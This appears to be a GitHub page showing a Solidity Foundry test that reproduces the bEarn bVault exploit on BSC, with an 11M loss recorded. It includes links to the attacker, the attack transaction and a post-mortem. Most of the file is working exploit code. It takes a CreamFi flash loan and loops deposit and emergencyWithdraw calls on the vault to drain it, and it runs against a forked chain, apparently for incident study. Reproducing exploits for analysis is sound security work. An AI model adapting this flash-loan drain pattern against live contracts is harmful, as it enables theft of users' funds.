-
Notifications
You must be signed in to change notification settings - Fork 1.2k
/
Copy pathbEarn_exp.sol
65 lines (51 loc) · 2.37 KB
/
bEarn_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 11M
// Attacker : https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089
// Attack Contract : https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c850c3be6
// Vulnerable Contract : https://bscscan.com/address/0xb390b07fcf76678089cb12d8e615d5fe494b01fb
// Attack Tx : https://bscscan.com/tx/0x603b2bbe2a7d0877b22531735ff686a7caad866f6c0435c37b7b49e4bfd9a36c
// @Info
// Vulnerable Contract Code : https://bscscan.com/address/0xb390b07fcf76678089cb12d8e615d5fe494b01fb#code
// @Analysis
// Post-mortem : https://bearndao.medium.com/bvaults-busd-alpaca-strategy-exploit-post-mortem-and-bearn-s-compensation-plan-b0b38c3b5540
// Twitter Guy :
// Hacking God :
pragma solidity ^0.8.0;
interface ICreamFi {
function flashLoan(address receiver, uint256 amount, bytes calldata params) external;
function getCash() external returns (uint256);
}
interface IBVault {
function deposit(uint256 _pid, uint256 _wantAmt) external;
function emergencyWithdraw(
uint256 _pid
) external;
}
contract bEarn is BaseTestWithBalanceLog {
uint256 blocknumToForkFrom = 7_457_124;
address internal CreamFi = 0x2Bc4eb013DDee29D37920938B96d353171289B7C;
address internal BUSD = 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56;
address internal bVault = 0xB390B07fcF76678089cb12d8E615d5Fe494b01Fb;
function setUp() public {
vm.createSelectFork("bsc", blocknumToForkFrom);
//Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
fundingToken = address(BUSD);
}
function testExploit() public balanceLog {
//implement exploit code here
address receiver = address(this);
uint256 amount = ICreamFi(CreamFi).getCash();
ICreamFi(CreamFi).flashLoan(receiver, amount, "1");
}
function executeOperation(address, address underlying, uint256 amount, uint256 fee, bytes memory) external {
IERC20(BUSD).approve(bVault, type(uint256).max);
for (uint256 i = 0; i < 10; i++) {
IBVault(bVault).deposit(13, IERC20(underlying).balanceOf(address(this)) - 1);
IBVault(bVault).emergencyWithdraw(13);
}
IERC20(BUSD).transfer(CreamFi, amount + fee);
}
}